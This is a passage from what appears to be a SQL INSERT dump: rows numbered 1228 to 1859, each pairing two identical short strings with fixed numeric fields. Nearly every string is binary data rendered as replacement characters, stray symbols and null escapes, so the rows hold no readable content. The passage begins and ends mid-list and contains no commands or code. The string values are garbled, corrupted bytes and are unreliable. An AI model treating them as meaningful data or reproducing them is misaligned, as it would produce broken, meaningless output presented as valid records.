(1228,'=f\Z','=f\Z',1,0,90,0),
(1229,'-7�S','-7�S',1,0,90,0),
(1230,'�AV�','�AV�',1,0,90,0),
(1231,'r�','r�',1,0,90,0),
(1232,'r�','r�',1,0,90,0),
(1233,'��n)','��n)',1,0,90,0),
(1234,'\"|��','\"|��',1,0,90,0),
(1235,'�+pa','�+pa',1,0,90,0),
(1236,'h�� ','h�� ',1,0,90,0),
(1237,'���','���',1,0,90,0),
(1238,'&�','&�',1,0,90,0),
(1239,'gW�','gW�',1,0,90,0),
(1240,'»�[','»�[',1,0,90,0),
(1241,'�Fo','�Fo',1,0,90,0),
(1242,'^u�','^u�',1,0,90,0),
(1243,'MDV','MDV',1,0,90,0),
(1244,'�n�','�n�',1,0,90,0),
(1245,'oDa�','oDa�',1,0,90,0),
(1246,'Rd�a','Rd�a',1,0,90,0),
(1247,'+�� ','+�� ',1,0,90,0),
(1248,'��u�','��u�',1,0,90,0),
(1249,'���','���',1,0,90,0),
(1250,'���e','���e',1,0,90,0),
(1251,'�F4`','�F4`',1,0,90,0),
(1252,':G�%',':G�%',1,0,90,0),
(1253,'�]˜','�]˜',1,0,90,0),
(1254,'ė�','ė�',1,0,90,0),
(1255,'��;y','��;y',1,0,90,0),
(1256,'�z','�z',1,0,90,0),
(1257,'Yj�7','Yj�7',1,0,90,0),
(1258,'g��+','g��+',1,0,90,0),
(1259,'���','���',1,0,90,0),
(1260,'��X�','��X�',1,0,90,0),
(1261,'��','��',1,0,90,0),
(1262,'�\Z�f','�\Z�f',1,0,90,0),
(1263,'F-�','F-�',1,0,90,0),
(1264,'*\r|@0\0 �\0\0\0\0\0\0\0','*\r|@0\0 �\0\0\0\0\0\0\0',1,0,90,1),
(1265,'�6rg','�6rg',1,0,90,0),
(1266,'���','���',1,0,90,0),
(1267,'���b','���b',1,0,90,0),
(1268,'\\���','\\���',1,0,90,0),
(1269,'C�/','C�/',1,0,90,0),
(1270,'We\\�','We\\�',1,0,90,0),
(1271,'Y�+','Y�+',1,0,90,0),
(1272,'DB�','DB�',1,0,90,0),
(1273,'.�p\n','.�p\n',1,0,90,0),
(1274,'\"�p�','\"�p�',1,0,90,0),
(1275,'�V{:','�V{:',1,0,90,0),
(1276,'BF�]','BF�]',1,0,90,0),
(1277,'>��','>��',1,0,90,0),
(1278,'-U�u','-U�u',1,0,90,0),
(1279,'*��#�\0\0\0\0\0\0\0','*��#�\0\0\0\0\0\0\0',1,0,90,1),
(1280,'��E','��E',1,0,90,0),
(1281,'-O�}','-O�}',1,0,90,0),
(1282,'���','���',1,0,90,0),
(1283,'��Ǖ','��Ǖ',1,0,90,0),
(1284,'�Z� ','�Z� ',1,0,90,0),
(1285,'\\̇','\\̇',1,0,90,0),
(1286,'E��+','E��+',1,0,90,0),
(1287,'�L]h','�L]h',1,0,90,0),
(1288,'gf�','gf�',1,0,90,0),
(1289,'ˡ �','ˡ �',1,0,90,0),
(1290,'�G�?','�G�?',1,0,90,0),
(1291,'�ݸj','�ݸj',1,0,90,0),
(1292,'�G�J','�G�J',1,0,90,0),
(1293,'��','��',1,0,90,0),
(1294,'p�f�','p�f�',1,0,90,0),
(1295,'�&R�','�&R�',1,0,90,0),
(1296,'��B�','��B�',1,0,90,0),
(1297,'�Lv','�Lv',1,0,90,0),
(1298,'��s','��s',1,0,90,0),
(1299,'�\0��','�\0��',1,0,90,0),
(1300,'Y�V','Y�V',1,0,90,0),
(1301,'6ƿ','6ƿ',1,0,90,0),
(1302,'���*','���*',1,0,90,0),
(1303,'�sf','�sf',1,0,90,0),
(1304,'3D��','3D��',1,0,90,0),
(1305,'�bf�','�bf�',1,0,90,0),
(1306,'�Y','�Y',1,0,90,0),
(1307,':�G)',':�G)',1,0,90,0),
(1308,'����','����',1,0,90,0),
(1309,'B^}�','B^}�',1,0,90,0),
(1310,'E��','E��',1,0,90,0),
(1311,'�aC�','�aC�',1,0,90,0),
(1312,'\\��','\\��',1,0,90,0),
(1313,'�h','�h',1,0,90,0),
(1314,'�','�',1,0,90,0),
(1315,'?�&�','?�&�',1,0,90,0),
(1316,'��k','��k',1,0,90,0),
(1317,'S��3','S��3',1,0,90,0),
(1318,'���','���',1,0,90,0),
(1319,'k�g','k�g',1,0,90,0),
(1320,'\'dOV','\'dOV',1,0,90,0),
(1321,'؉��','؉��',1,0,90,0),
(1322,'��','��',1,0,90,0),
(1323,'�%�#','�%�#',1,0,90,0),
(1324,'� k','� k',1,0,90,0),
(1325,'.��','.��',1,0,90,0),
(1326,'��','��',1,0,90,0),
(1327,'�T�','�T�',1,0,90,0),
(1328,'��C','��C',1,0,90,0),
(1329,'6U��','6U��',1,0,90,0),
(1330,'H.�r','H.�r',1,0,90,0),
(1331,'[k��','[k��',1,0,90,0),
(1332,'�젂','�젂',1,0,90,0),
(1333,'�Dt�','�Dt�',1,0,90,0),
(1334,'&���','&���',1,0,90,0),
(1335,'�@��','�@��',1,0,90,0),
(1336,'��A�','��A�',1,0,90,0),
(1337,'Nl+c','Nl+c',1,0,90,0),
(1338,'�~V','�~V',1,0,90,0),
(1339,'��P�','��P�',1,0,90,0),
(1340,'K��','K��',1,0,90,0),
(1341,'�.Q','�.Q',1,0,90,0),
(1342,'\\��','\\��',1,0,90,0),
(1343,'�2��','�2��',1,0,90,0),
(1344,'�ؾ','�ؾ',1,0,90,0),
(1345,'�sT�','�sT�',1,0,90,0),
(1346,'h�z?','h�z?',1,0,90,0),
(1347,'RP�\n','RP�\n',1,0,90,0),
(1348,'g�gk','g�gk',1,0,90,0),
(1349,'Al#�','Al#�',1,0,90,0),
(1350,'-���','-���',1,0,90,0),
(1351,'Cͥ','Cͥ',1,0,90,0),
(1352,'k�OW','k�OW',1,0,90,0),
(1353,'�R','�R',1,0,90,0),
(1354,'�,�6','�,�6',1,0,90,0),
(1355,'�','�',1,0,90,0),
(1356,'R�92','R�92',1,0,90,0),
(1357,'-u�','-u�',1,0,90,0),
(1358,')��',')��',1,0,90,0),
(1359,'3gJ','3gJ',1,0,90,0),
(1360,'�P�)','�P�)',1,0,90,0),
(1361,'�Z�*','�Z�*',1,0,90,0),
(1362,'��','��',1,0,90,0),
(1363,'��<�','��<�',1,0,90,0),
(1364,'g�8','g�8',1,0,90,0),
(1365,'^.��','^.��',1,0,90,0),
(1366,'#���','#���',1,0,90,0),
(1367,'g�֬','g�֬',1,0,90,0),
(1368,'�\Z�!','�\Z�!',1,0,90,0),
(1369,'g��','g��',1,0,90,0),
(1370,'[�','[�',1,0,90,0),
(1371,'+�','+�',1,0,90,0),
(1372,'g�>v','g�>v',1,0,90,0),
(1373,'O���','O���',1,0,90,0),
(1374,'��/ ','��/ ',1,0,90,0),
(1375,'�+z�','�+z�',1,0,90,0),
(1376,'��B','��B',1,0,90,0),
(1377,'On0�','On0�',1,0,90,0),
(1378,'>f��','>f��',1,0,90,0),
(1379,'�','�',1,0,90,0),
(1380,'JН/','JН/',1,0,90,0),
(1381,'�\n','�\n',1,0,90,0),
(1382,'��*','��*',1,0,90,0),
(1383,'�`��','�`��',1,0,90,0),
(1384,'h��','h��',1,0,90,0),
(1385,'��','��',1,0,90,0),
(1386,'[�9s','[�9s',1,0,90,0),
(1387,'�~�','�~�',1,0,90,0),
(1388,'�ӻ','�ӻ',1,0,90,0),
(1389,'�%�','�%�',1,0,90,0),
(1390,'����','����',1,0,90,0),
(1391,'ْSj','ْSj',1,0,90,0),
(1392,'�(','�(',1,0,90,0),
(1393,'�K�;','�K�;',1,0,90,0),
(1394,'.�أ','.�أ',1,0,90,0),
(1395,'���s','���s',1,0,90,0),
(1396,'�bf�','�bf�',1,0,90,0),
(1397,'k��S','k��S',1,0,90,0),
(1398,'�ch#','�ch#',1,0,90,0),
(1399,'�E','�E',1,0,90,0),
(1400,'���6','���6',1,0,90,0),
(1401,'%x�S','%x�S',1,0,90,0),
(1402,'�c','�c',1,0,90,0),
(1403,'�K��','�K��',1,0,90,0),
(1404,'�ћ','�ћ',1,0,90,0),
(1405,'���,','���,',1,0,90,0),
(1406,'���','���',1,0,90,0),
(1407,'>�g�','>�g�',1,0,90,0),
(1408,'�/\"','�/\"',1,0,90,0),
(1409,'��]','��]',1,0,90,0),
(1410,'���','���',1,0,90,0),
(1411,'��','��',1,0,90,0),
(1412,' A�)\0\0\0\0\0\0\0\0',' A�)\0\0\0\0\0\0\0\0',1,0,90,1),
(1413,'��X','��X',1,0,90,0),
(1414,'�~��','�~��',1,0,90,0),
(1415,'ي�','ي�',1,0,90,0),
(1416,'oO�','oO�',1,0,90,0),
(1417,'���','���',1,0,90,0),
(1418,'\"���','\"���',1,0,90,0),
(1419,'[��+','[��+',1,0,90,0),
(1420,'��2�','��2�',1,0,90,0),
(1421,'�d','�d',1,0,90,0),
(1422,'��+','��+',1,0,90,0),
(1423,'�Y','�Y',1,0,90,0),
(1424,'�_.}','�_.}',1,0,90,0),
(1425,'��j','��j',1,0,90,0),
(1426,'%��','%��',1,0,90,0),
(1427,'���+','���+',1,0,90,0),
(1428,'�K�#','�K�#',1,0,90,0),
(1429,'���L','���L',1,0,90,0),
(1430,'��','��',1,0,90,0),
(1431,'��=j','��=j',1,0,90,0),
(1432,'E�ζ','E�ζ',1,0,90,0),
(1433,'ٶ�)','ٶ�)',1,0,90,0),
(1434,'��','��',1,0,90,0),
(1435,'ي�','ي�',1,0,90,0),
(1436,'�^W\0','�^W\0',1,0,90,0),
(1437,'�','�',1,0,90,0),
(1438,'�?(z','�?(z',1,0,90,0),
(1439,'��','��',1,0,90,0),
(1440,'WvH','WvH',1,0,90,0),
(1441,'����','����',1,0,90,0),
(1442,'ي�{','ي�{',1,0,90,0),
(1443,'�FL#','�FL#',1,0,90,0),
(1444,'^�O}','^�O}',1,0,90,0),
(1445,'k��C','k��C',1,0,90,0),
(1446,'m�:�','m�:�',1,0,90,0),
(1447,'&\0<\0\0\0\0�<���PW','&\0<\0\0\0\0�<���PW',1,0,90,1),
(1448,'�_�l','�_�l',1,0,90,0),
(1449,'�ɂ�','�ɂ�',1,0,90,0),
(1450,'f��','f��',1,0,90,0),
(1451,'��U�','��U�',1,0,90,0),
(1452,'-�&','-�&',1,0,90,0),
(1453,'��~�','��~�',1,0,90,0),
(1454,'B!ˆ','B!ˆ',1,0,90,0),
(1455,'��CA','��CA',1,0,90,0),
(1456,'�x��','�x��',1,0,90,0),
(1457,'©�L','©�L',1,0,90,0),
(1458,'\r~W�','\r~W�',1,0,90,0),
(1459,'��','��',1,0,90,0),
(1460,'P��','P��',1,0,90,0),
(1461,'O���','O���',1,0,90,0),
(1462,'����','����',1,0,90,0),
(1463,'3ގx','3ގx',1,0,90,0),
(1464,'�M0�','�M0�',1,0,90,0),
(1465,'','',1,0,90,0),
(1466,'��(�','��(�',1,0,90,0),
(1467,'ν�_','ν�_',1,0,90,0),
(1468,'��(�','��(�',1,0,90,0),
(1469,'k�{�','k�{�',1,0,90,0),
(1470,'��U','��U',1,0,90,0),
(1471,'^��8','^��8',1,0,90,0),
(1472,'��#0','��#0',1,0,90,0),
(1473,'٠-�','٠-�',1,0,90,0),
(1474,'©�\\','©�\\',1,0,90,0),
(1475,'k��','k��',1,0,90,0),
(1476,'���B','���B',1,0,90,0),
(1477,'*�E\0\0\0TtZI�� ','*�E\0\0\0TtZI�� ',1,0,90,1),
(1478,'��o}','��o}',1,0,90,0),
(1479,'���','���',1,0,90,0),
(1480,'h�`','h�`',1,0,90,0),
(1481,'v�]','v�]',1,0,90,0),
(1482,'��<�','��<�',1,0,90,0),
(1483,'����','����',1,0,90,0),
(1484,'э\"�','э\"�',1,0,90,0),
(1485,'©�\Z','©�\Z',1,0,90,0),
(1486,'��;�','��;�',1,0,90,0),
(1487,'��D�','��D�',1,0,90,0),
(1488,'C�\Z�','C�\Z�',1,0,90,0),
(1489,'(S9�','(S9�',1,0,90,0),
(1490,'��i','��i',1,0,90,0),
(1491,'��d','��d',1,0,90,0),
(1492,'©�','©�',1,0,90,0),
(1493,'*�E\0\0\0����[��','*�E\0\0\0����[��',1,0,90,1),
(1494,'UѰ0','UѰ0',1,0,90,0),
(1495,'����','����',1,0,90,0),
(1496,'���','���',1,0,90,0),
(1497,'��kU','��kU',1,0,90,0),
(1498,'%�[�','%�[�',1,0,90,0),
(1499,'-P\r','-P\r',1,0,90,0),
(1500,'/[|�','/[|�',1,0,90,0),
(1501,'^��`','^��`',1,0,90,0),
(1502,'3i','3i',1,0,90,0),
(1503,'k��','k��',1,0,90,0),
(1504,'�FQ�','�FQ�',1,0,90,0),
(1505,'�V;','�V;',1,0,90,0),
(1506,'(z��','(z��',1,0,90,0),
(1507,'h��;','h��;',1,0,90,0),
(1508,'l��M','l��M',1,0,90,0),
(1509,'k�','k�',1,0,90,0),
(1510,'*Y\\','*Y\\',1,0,90,0),
(1511,'#���','#���',1,0,90,0),
(1512,'©��','©��',1,0,90,0),
(1513,'�b5[','�b5[',1,0,90,0),
(1514,'���A','���A',1,0,90,0),
(1515,')ؼ�',')ؼ�',1,0,90,0),
(1516,'N�\\','N�\\',1,0,90,0),
(1517,'©��','©��',1,0,90,0),
(1518,'��R�','��R�',1,0,90,0),
(1519,'k��','k��',1,0,90,0),
(1520,'Y$)','Y$)',1,0,90,0),
(1521,'˽��','˽��',1,0,90,0),
(1522,'��','��',1,0,90,0),
(1523,'��Md','��Md',1,0,90,0),
(1524,'?��','?��',1,0,90,0),
(1525,'э1�','э1�',1,0,90,0),
(1526,'k�r6','k�r6',1,0,90,0),
(1527,'*�E\0\0\0�`Y˟���','*�E\0\0\0�`Y˟���',1,0,90,1),
(1528,'�c9.','�c9.',1,0,90,0),
(1529,'_�','_�',1,0,90,0),
(1530,'_��','_��',1,0,90,0),
(1531,'(S>�','(S>�',1,0,90,0),
(1532,'\'Z\\','\'Z\\',1,0,90,0),
(1533,'3�l','3�l',1,0,90,0),
(1534,'h�XR','h�XR',1,0,90,0),
(1535,'��s','��s',1,0,90,0),
(1536,'�EO','�EO',1,0,90,0),
(1537,'3��C','3��C',1,0,90,0),
(1538,'�}�u','�}�u',1,0,90,0),
(1539,'��U?','��U?',1,0,90,0),
(1540,'�\"; ','�\"; ',1,0,90,0),
(1541,'(S8�','(S8�',1,0,90,0),
(1542,'/4�<','/4�<',1,0,90,0),
(1543,'��8','��8',1,0,90,0),
(1544,'>ҹ','>ҹ',1,0,90,0),
(1545,'UѰ','UѰ',1,0,90,0),
(1546,'k�\nT','k�\nT',1,0,90,0),
(1547,'t�','t�',1,0,90,0),
(1548,'��*�','��*�',1,0,90,0),
(1549,'���5','���5',1,0,90,0),
(1550,'�Dz�','�Dz�',1,0,90,0),
(1551,'`}�6','`}�6',1,0,90,0),
(1552,'%;5R','%;5R',1,0,90,0),
(1553,'g�X','g�X',1,0,90,0),
(1554,'©�','©�',1,0,90,0),
(1555,'�6��','�6��',1,0,90,0),
(1556,'��U�','��U�',1,0,90,0),
(1557,'�;7','�;7',1,0,90,0),
(1558,'3Q�f','3Q�f',1,0,90,0),
(1559,'��$I','��$I',1,0,90,0),
(1560,'h�F1','h�F1',1,0,90,0),
(1561,'�A,m','�A,m',1,0,90,0),
(1562,'�dz','�dz',1,0,90,0),
(1563,'1���','1���',1,0,90,0),
(1564,'BF�*','BF�*',1,0,90,0),
(1565,'�M�','�M�',1,0,90,0),
(1566,'*\0�@�@��\0\0\0\0.�(�','*\0�@�@��\0\0\0\0.�(�',1,0,90,1),
(1567,'���g','���g',1,0,90,0),
(1568,'��','��',1,0,90,0),
(1569,'\\�FB','\\�FB',1,0,90,0),
(1570,'^��l','^��l',1,0,90,0),
(1571,'3��O','3��O',1,0,90,0),
(1572,'.���','.���',1,0,90,0),
(1573,'�P<�','�P<�',1,0,90,0),
(1574,'@�!?','@�!?',1,0,90,0),
(1575,'k�o1','k�o1',1,0,90,0),
(1576,'^��','^��',1,0,90,0),
(1577,'\"�U�','\"�U�',1,0,90,0),
(1578,'�A�','�A�',1,0,90,0),
(1579,'©�]','©�]',1,0,90,0),
(1580,'On>D','On>D',1,0,90,0),
(1581,'����','����',1,0,90,0),
(1582,'�PC�','�PC�',1,0,90,0),
(1583,'���','���',1,0,90,0),
(1584,'���','���',1,0,90,0),
(1585,'D��5','D��5',1,0,90,0),
(1586,'��p','��p',1,0,90,0),
(1587,'����','����',1,0,90,0),
(1588,'���','���',1,0,90,0),
(1589,'�~��','�~��',1,0,90,0),
(1590,'���>','���>',1,0,90,0),
(1591,'νWB','νWB',1,0,90,0),
(1592,'�','�',1,0,90,0),
(1593,'B�\'','B�\'',1,0,90,0),
(1594,'���','���',1,0,90,0),
(1595,'�\\(�','�\\(�',1,0,90,0),
(1596,'��G','��G',1,0,90,0),
(1597,'�ALS','�ALS',1,0,90,0),
(1598,'k�a','k�a',1,0,90,0),
(1599,'����','����',1,0,90,0),
(1600,'��>l','��>l',1,0,90,0),
(1601,'Bs�:','Bs�:',1,0,90,0),
(1602,'��h','��h',1,0,90,0),
(1603,'�Ac','�Ac',1,0,90,0),
(1604,'�N/z','�N/z',1,0,90,0),
(1605,'v�Tf','v�Tf',1,0,90,0),
(1606,'�]0�','�]0�',1,0,90,0),
(1607,'���','���',1,0,90,0),
(1608,'(z�>','(z�>',1,0,90,0),
(1609,'��O','��O',1,0,90,0),
(1610,'��^�','��^�',1,0,90,0),
(1611,'�;S�','�;S�',1,0,90,0),
(1612,'.�(�','.�(�',1,0,90,0),
(1613,'���#','���#',1,0,90,0),
(1614,'���','���',1,0,90,0),
(1615,')ؼ�',')ؼ�',1,0,90,0),
(1616,'���p','���p',1,0,90,0),
(1617,'��g�','��g�',1,0,90,0),
(1618,'�}:','�}:',1,0,90,0),
(1619,'��','��',1,0,90,0),
(1620,'^�w','^�w',1,0,90,0),
(1621,'On0�','On0�',1,0,90,0),
(1622,'�q�\r','�q�\r',1,0,90,0),
(1623,'�;,0','�;,0',1,0,90,0),
(1624,'�G�S','�G�S',1,0,90,0),
(1625,'E1pE','E1pE',1,0,90,0),
(1626,'e��','e��',1,0,90,0),
(1627,'��Y@','��Y@',1,0,90,0),
(1628,'g$j','g$j',1,0,90,0),
(1629,'h��B','h��B',1,0,90,0),
(1630,'�̷�','�̷�',1,0,90,0),
(1631,'���','���',1,0,90,0),
(1632,'t˛�','t˛�',1,0,90,0),
(1633,'\"�j\Z','\"�j\Z',1,0,90,0),
(1634,'-�צ','-�צ',1,0,90,0),
(1635,'�,7�','�,7�',1,0,90,0),
(1636,'.�','.�',1,0,90,0),
(1637,'Kw�8','Kw�8',1,0,90,0),
(1638,'���,','���,',1,0,90,0),
(1639,'h��','h��',1,0,90,0),
(1640,'�`/','�`/',1,0,90,0),
(1641,'�F>','�F>',1,0,90,0),
(1642,'��','��',1,0,90,0),
(1643,'4p','4p',1,0,90,0),
(1644,'���]','���]',1,0,90,0),
(1645,'�_�','�_�',1,0,90,0),
(1646,'*@\0\0\0���Z���','*@\0\0\0���Z���',1,0,90,1),
(1647,'g�5','g�5',1,0,90,0),
(1648,'�]��','�]��',1,0,90,0),
(1649,'*�y�\0\0\0\0\0\06','*�y�\0\0\0\0\0\06',1,0,90,1),
(1650,'�2\\�','�2\\�',1,0,90,0),
(1651,'A<=G','A<=G',1,0,90,0),
(1652,'Ѷ�p','Ѷ�p',1,0,90,0),
(1653,'n]�Z','n]�Z',1,0,90,0),
(1654,'٥+�','٥+�',1,0,90,0),
(1655,'-�(Y','-�(Y',1,0,90,0),
(1656,'���','���',1,0,90,0),
(1657,'>�x\Z','>�x\Z',1,0,90,0),
(1658,'���]','���]',1,0,90,0),
(1659,'�¤�','�¤�',1,0,90,0),
(1660,'�;Q�','�;Q�',1,0,90,0),
(1661,'R�dd','R�dd',1,0,90,0),
(1662,'�Yl<','�Yl<',1,0,90,0),
(1663,'4�H)','4�H)',1,0,90,0),
(1664,'����','����',1,0,90,0),
(1665,'�Қ','�Қ',1,0,90,0),
(1666,'Am`�','Am`�',1,0,90,0),
(1667,'m�#3','m�#3',1,0,90,0),
(1668,'�]�U','�]�U',1,0,90,0),
(1669,'\"KD�','\"KD�',1,0,90,0),
(1670,'��','��',1,0,90,0),
(1671,'���K','���K',1,0,90,0),
(1672,' A�\0U0\0\0\0\0\0\0\0\0',' A�\0U0\0\0\0\0\0\0\0\0',1,0,90,1),
(1673,'����','����',1,0,90,0),
(1674,'*\0(\0)B\0\0\0\0\0\0\0','*\0(\0)B\0\0\0\0\0\0\0',1,0,90,1),
(1675,'���','���',1,0,90,0),
(1676,'�\Z�.','�\Z�.',1,0,90,0),
(1677,'2=','2=',1,0,90,0),
(1678,'ԁ&/','ԁ&/',1,0,90,0),
(1679,'&��N','&��N',1,0,90,0),
(1680,'�#8�','�#8�',1,0,90,0),
(1681,'��O�','��O�',1,0,90,0),
(1682,'6%p','6%p',1,0,90,0),
(1683,'���','���',1,0,90,0),
(1684,'�jpU','�jpU',1,0,90,0),
(1685,'R`��','R`��',1,0,90,0),
(1686,'�n\"�','�n\"�',1,0,90,0),
(1687,'���','���',1,0,90,0),
(1688,'�]�2','�]�2',1,0,90,0),
(1689,'f�T�','f�T�',1,0,90,0),
(1690,'���9','���9',1,0,90,0),
(1691,'�1d�','�1d�',1,0,90,0),
(1692,'���e','���e',1,0,90,0),
(1693,'3&4','3&4',1,0,90,0),
(1694,'<Ͱ[','<Ͱ[',1,0,90,0),
(1695,'*�:�\0\0\0\0\0\0\0','*�:�\0\0\0\0\0\0\0',1,0,90,1),
(1696,'�O��','�O��',1,0,90,0),
(1697,'N� ','N� ',1,0,90,0),
(1698,'4��:','4��:',1,0,90,0),
(1699,'4<I�','4<I�',1,0,90,0),
(1700,'��J�','��J�',1,0,90,0),
(1701,'gb�\"','gb�\"',1,0,90,0),
(1702,'�;��','�;��',1,0,90,0),
(1703,'6\'2{','6\'2{',1,0,90,0),
(1704,'�ɤ�','�ɤ�',1,0,90,0),
(1705,'g�D','g�D',1,0,90,0),
(1706,'^�A','^�A',1,0,90,0),
(1707,'�rau','�rau',1,0,90,0),
(1708,'�*t�','�*t�',1,0,90,0),
(1709,'*\0�@�@��\0\0\0\0.�(W','*\0�@�@��\0\0\0\0.�(W',1,0,90,1),
(1710,'�w�','�w�',1,0,90,0),
(1711,'��','��',1,0,90,0),
(1712,'Y��t','Y��t',1,0,90,0),
(1713,'[��-','[��-',1,0,90,0),
(1714,'#�<}','#�<}',1,0,90,0),
(1715,'D�q\Z','D�q\Z',1,0,90,0),
(1716,'&\0��\0���a���E','&\0��\0���a���E',1,0,90,1),
(1717,'�V{ ','�V{ ',1,0,90,0),
(1718,'^g�','^g�',1,0,90,0),
(1719,'.)�,','.)�,',1,0,90,0),
(1720,'��','��',1,0,90,0),
(1721,'MD�','MD�',1,0,90,0),
(1722,'#ᚴ','#ᚴ',1,0,90,0),
(1723,'�Uu','�Uu',1,0,90,0),
(1724,'���','���',1,0,90,0),
(1725,'*\0�\0\0\0\0\0\0.� \n','*\0�\0\0\0\0\0\0.� \n',1,0,90,1),
(1726,' t�',' t�',1,0,90,0),
(1727,'C�T�','C�T�',1,0,90,0),
(1728,' A�\0\nkN\0\0\0\0\0\0\0',' A�\0\nkN\0\0\0\0\0\0\0',1,0,90,1),
(1729,'@9\\','@9\\',1,0,90,0),
(1730,'U�4�','U�4�',1,0,90,0),
(1731,'�J�','�J�',1,0,90,0),
(1732,'3�[|','3�[|',1,0,90,0),
(1733,'#�X}','#�X}',1,0,90,0),
(1734,'4H!�','4H!�',1,0,90,0),
(1735,'U��c','U��c',1,0,90,0),
(1736,'X�)�','X�)�',1,0,90,0),
(1737,'#�B=','#�B=',1,0,90,0),
(1738,'g;,','g;,',1,0,90,0),
(1739,'��J�','��J�',1,0,90,0),
(1740,'C�e','C�e',1,0,90,0),
(1741,'^��','^��',1,0,90,0),
(1742,'*Y@�\0\0\0\0\0\0\0\0\0','*Y@�\0\0\0\0\0\0\0\0\0',1,0,90,1),
(1743,'�;�\'','�;�\'',1,0,90,0),
(1744,'�S�','�S�',1,0,90,0),
(1745,'�s','�s',1,0,90,0),
(1746,'��e$','��e$',1,0,90,0),
(1747,'Y, M','Y, M',1,0,90,0),
(1748,'*G�\0\0�L���/�','*G�\0\0�L���/�',1,0,90,1),
(1749,'�^L','�^L',1,0,90,0),
(1750,'����','����',1,0,90,0),
(1751,'�D/B','�D/B',1,0,90,0),
(1752,'���Y','���Y',1,0,90,0),
(1753,'Q���','Q���',1,0,90,0),
(1754,'3O�F','3O�F',1,0,90,0),
(1755,'h�R','h�R',1,0,90,0),
(1756,'�h��','�h��',1,0,90,0),
(1757,'*@\0\0\0��>v���2s','*@\0\0\0��>v���2s',1,0,90,1),
(1758,'�QQ','�QQ',1,0,90,0),
(1759,'3M4j','3M4j',1,0,90,0),
(1760,'�*t�','�*t�',1,0,90,0),
(1761,'��','��',1,0,90,0),
(1762,'mFd','mFd',1,0,90,0),
(1763,'*G�\0o�\0\0\0\0\0\0\0','*G�\0o�\0\0\0\0\0\0\0',1,0,90,1),
(1764,'*\0�@�@��\0\0\0\0.�*S','*\0�@�@��\0\0\0\0.�*S',1,0,90,1),
(1765,'�! �','�! �',1,0,90,0),
(1766,'[�.@','[�.@',1,0,90,0),
(1767,'�8�','�8�',1,0,90,0),
(1768,'ٶG�','ٶG�',1,0,90,0),
(1769,'$�n','$�n',1,0,90,0),
(1770,'�$��','�$��',1,0,90,0),
(1771,'>\Z/','>\Z/',1,0,90,0),
(1772,'O:Tm','O:Tm',1,0,90,0),
(1773,'ت|�','ت|�',1,0,90,0),
(1774,'3M�L','3M�L',1,0,90,0),
(1775,'#�n','#�n',1,0,90,0),
(1776,'[�h�','[�h�',1,0,90,0),
(1777,'����','����',1,0,90,0),
(1778,'[��','[��',1,0,90,0),
(1779,'U��_','U��_',1,0,90,0),
(1780,'gw�','gw�',1,0,90,0),
(1781,'\\5c�','\\5c�',1,0,90,0),
(1782,'�9\n�','�9\n�',1,0,90,0),
(1783,'*� \'\0\0\0\0\0\0\0','*� \'\0\0\0\0\0\0\0',1,0,90,1),
(1784,'��_�','��_�',1,0,90,0),
(1785,'hϔ�','hϔ�',1,0,90,0),
(1786,'6\'�;','6\'�;',1,0,90,0),
(1787,'%;.','%;.',1,0,90,0),
(1788,'.�*S','.�*S',1,0,90,0),
(1789,'Wj�=','Wj�=',1,0,90,0),
(1790,'s�D�','s�D�',1,0,90,0),
(1791,'ج�4','ج�4',1,0,90,0),
(1792,'*@\0\0\0��h���tu','*@\0\0\0��h���tu',1,0,90,1),
(1793,'��','��',1,0,90,0),
(1794,'R���','R���',1,0,90,0),
(1795,'-7','-7',1,0,90,0),
(1796,'l���','l���',1,0,90,0),
(1797,'��','��',1,0,90,0),
(1798,'X�2','X�2',1,0,90,0),
(1799,'M�#','M�#',1,0,90,0),
(1800,'�`Y','�`Y',1,0,90,0),
(1801,'�!','�!',1,0,90,0),
(1802,'��','��',1,0,90,0),
(1803,'��#�','��#�',1,0,90,0),
(1804,'��g','��g',1,0,90,0),
(1805,'�\\O�','�\\O�',1,0,90,0),
(1806,'�_��','�_��',1,0,90,0),
(1807,'��ߖ','��ߖ',1,0,90,0),
(1808,'�Y��','�Y��',1,0,90,0),
(1809,'[�','[�',1,0,90,0),
(1810,'%��','%��',1,0,90,0),
(1811,'^M�','^M�',1,0,90,0),
(1812,'��','��',1,0,90,0),
(1813,'$\0�\0\0\0\0�<���l','$\0�\0\0\0\0�<���l',1,0,90,1),
(1814,'\"Z�$','\"Z�$',1,0,90,0),
(1815,'�(�','�(�',1,0,90,0),
(1816,'��','��',1,0,90,0),
(1817,'C�)-','C�)-',1,0,90,0),
(1818,')�6',')�6',1,0,90,0),
(1819,'3�D�','3�D�',1,0,90,0),
(1820,'Kw��','Kw��',1,0,90,0),
(1821,' A�\0�\0\0\0\0\0\0\0\0',' A�\0�\0\0\0\0\0\0\0\0',1,0,90,1),
(1822,' �D\0j�T\0��aLK',' �D\0j�T\0��aLK',1,0,90,1),
(1823,'gnU�','gnU�',1,0,90,0),
(1824,'-Zm�','-Zm�',1,0,90,0),
(1825,'��d','��d',1,0,90,0),
(1826,'�NCB','�NCB',1,0,90,0),
(1827,'��̾','��̾',1,0,90,0),
(1828,'- d�','- d�',1,0,90,0),
(1829,'l=�%','l=�%',1,0,90,0),
(1830,'��]�','��]�',1,0,90,0),
(1831,'3Y�]','3Y�]',1,0,90,0),
(1832,'��ޠ','��ޠ',1,0,90,0),
(1833,'���S','���S',1,0,90,0),
(1834,'^��(','^��(',1,0,90,0),
(1835,'P�','P�',1,0,90,0),
(1836,' >V',' >V',1,0,90,0),
(1837,'��+','��+',1,0,90,0),
(1838,'>���','>���',1,0,90,0),
(1839,'�wQR','�wQR',1,0,90,0),
(1840,'Q�n','Q�n',1,0,90,0),
(1841,'���E','���E',1,0,90,0),
(1842,'�*t�','�*t�',1,0,90,0),
(1843,'O��\\','O��\\',1,0,90,0),
(1844,'��e\"','��e\"',1,0,90,0),
(1845,'%H$s','%H$s',1,0,90,0),
(1846,'*�\0*\"\0\0\0\0\0\0\0','*�\0*\"\0\0\0\0\0\0\0',1,0,90,1),
(1847,'ː��','ː��',1,0,90,0),
(1848,'3�H�','3�H�',1,0,90,0),
(1849,'_�Lt','_�Lt',1,0,90,0),
(1850,'�wA�','�wA�',1,0,90,0),
(1851,'. �x','. �x',1,0,90,0),
(1852,'PV0','PV0',1,0,90,0),
(1853,'�,��','�,��',1,0,90,0),
(1854,'��','��',1,0,90,0),
(1855,'�� ','�� ',1,0,90,0),
(1856,' A�\0i\0\0\0\0\0\0\0\0',' A�\0i\0\0\0\0\0\0\0\0',1,0,90,1),
(1857,'{�+�','{�+�',1,0,90,0),
(1858,'.�-','.�-',1,0,90,0),
(1859,'�\n9','�\n9',1,0,90,0),
